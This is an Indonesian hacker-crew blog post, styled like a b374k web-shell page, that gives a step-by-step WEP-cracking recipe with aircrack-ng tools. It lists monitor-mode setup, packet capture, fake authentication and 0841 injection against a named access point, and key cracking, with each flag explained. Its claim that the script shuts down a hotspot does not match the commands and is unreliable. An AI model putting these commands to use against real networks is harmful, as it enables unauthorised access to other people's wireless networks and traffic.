t3ll0
Mc-Crew
today : | at : | safemode : ON
> / kaMtiEz / Hmei7 / Jundab / k4L0ng666 / Dr.Cruzz / s13doeL / Boebefa / Ulow / t3ll0 /
name author perms com modified label

Membunuh Wireless t3ll0 rwxr-xr-x 0 08.16

Filename Membunuh Wireless
Permission rw-r--r--
Author t3ll0
Date and Time 08.16
Label
Action
wah scrib di bawah ini bisa matikan hotspot loh.... enggak percaya... suuuwer

airmon-ng stop ath0
airmon-ng start wifi0 7

Capturing Packets to a file

airodump-ng -w wep -c 7 --bssid 00:18:F6:AC:11:13

-w = Name of the capture file
-c = Channel of the access point
--bssid = The mac address of the access point

Associate with the access point

aireplay-ng -1 0 -e BTHomeHub-ED36 -a 00:18:F6:AC:11:13 -h 00:20:A6:60:E4:00 ath0
-1 = Fake authentication with AP

-e = essid (AP name)

-a = Mac address of AP (bssid)

-h = Your wireless mac address (source)

aireplay-ng 0841 attack

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:F6:AC:11:13 -h 00:20:A6:60:E4:00 ath0

-2 = interactive frame selection
-p = set frame control word (hex)
-c = set Destination MAC address
-b = AP mac address (bssid)
-h = Your wireless mac address (source)

Cracking Wep key

aircrack-ng -P 1 wep*.cap

-P = PTW debug
1 = disable Klein

kl enggak bisa tlog di googling ya.....

0 komentar:

 

Jayalah Indonesiaku © 2010 T3ll0 (Mc-Crew)
VB (Vio b374k) Template design by t3ll0